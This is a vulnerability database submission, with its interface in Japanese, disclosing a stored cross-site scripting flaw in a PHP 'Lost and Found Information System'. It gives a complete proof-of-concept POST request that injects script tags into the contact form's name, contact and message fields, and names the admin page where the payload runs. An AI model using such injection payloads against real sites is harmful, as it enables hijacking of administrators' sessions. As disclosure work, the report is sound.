提出 #155183: Stored XSS in Lost and Found Information System 1.0 View message send from contact form情報

タイトル	Stored XSS in Lost and Found Information System 1.0 View message send from contact form
説明	Detail: Stored XSS in Lost and Found Information System 1.0 in admin View message send from contact form Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html Production: Lost and Found Information System Version: 1.0 Request: POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3651031312771010866996354889 Content-Length: 839 Origin: http://localhost Connection: close Referer: http://localhost/php-lfis/?page=contact Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="id" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="visitor" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="fullname" Tuan"><script>alert('1')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="email" [email protected] -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="contact" Tuan"><script>alert('2')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="message" Tuan"><script>alert('3')</script> -----------------------------3651031312771010866996354889-- View effect: /php-lfis/admin/?page=inquiries/view_inquiry&id=2
ソース	⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
ユーザー	huutuanbg97 (UID 45015)
送信	2023年05月11日 15:33 (3 年 ago)
モデレーション	2023年05月12日 08:01 (16 hours later)
ステータス	承諾済み
VulDBエントリ	228887 [SourceCodester Lost and Found Information System 1.0 Contact Form Master.php?f=save_inquiry fullname/contact/message クロスサイトスクリプティング]
ポイント	20

◂ 前概要次 ▸

Interested in the pricing of exploits?

See the underground prices here!